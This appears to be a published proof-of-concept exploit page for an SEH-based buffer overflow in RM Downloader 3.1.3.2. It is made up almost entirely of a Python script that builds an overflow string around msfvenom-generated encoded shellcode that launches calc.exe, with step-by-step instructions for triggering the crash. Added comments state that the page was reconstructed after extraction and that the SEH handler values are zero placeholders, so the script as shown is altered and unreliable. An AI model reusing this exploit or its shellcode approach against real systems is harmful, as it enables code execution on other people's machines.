Published on April 22nd, 2020

RM Downloader 3.1.3.2.2010.06.13 Buffer Overflow


# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Date: 2020-04-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
# Version: 3.1.3.2.2010.06.13
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open 'RmDownloader.exe'
# 4.- Go to 'Load' tab
# 5.- Paste clipboard in 'Load' parameter
# 6.- Click on button 'OK'
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
# (The "\x" escapes below lost their backslashes during page extraction and have been restored;
# the 34 lines of 13 bytes plus the final 6 bytes add up to the stated 448.)

buf = b""
buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
buf += b"\x50\x65\x67\x70\x41\x41"

# The arguments of both struct.pack() calls were lost when the page was extracted (the "<" of the
# format string was swallowed as an HTML tag), so the nSEH and SEH values cannot be recovered
# from this page. The format string and the zero values below are placeholders, not the
# author's originals.
nseh = struct.pack("<L", 0x00000000)  # placeholder: original value not on the page
seh = struct.pack("<L", 0x00000000)   # placeholder: original value not on the page

# Everything is kept as bytes so the concatenation also works under Python 3 (the original
# mixed str and bytes, which only runs under Python 2).
buffer = b"A" * 9008 + nseh + seh + b"\x41\x49" * 10 + buf + b"\xff" * 200
with open("poc.txt", "wb") as f:
    f.write(buffer)
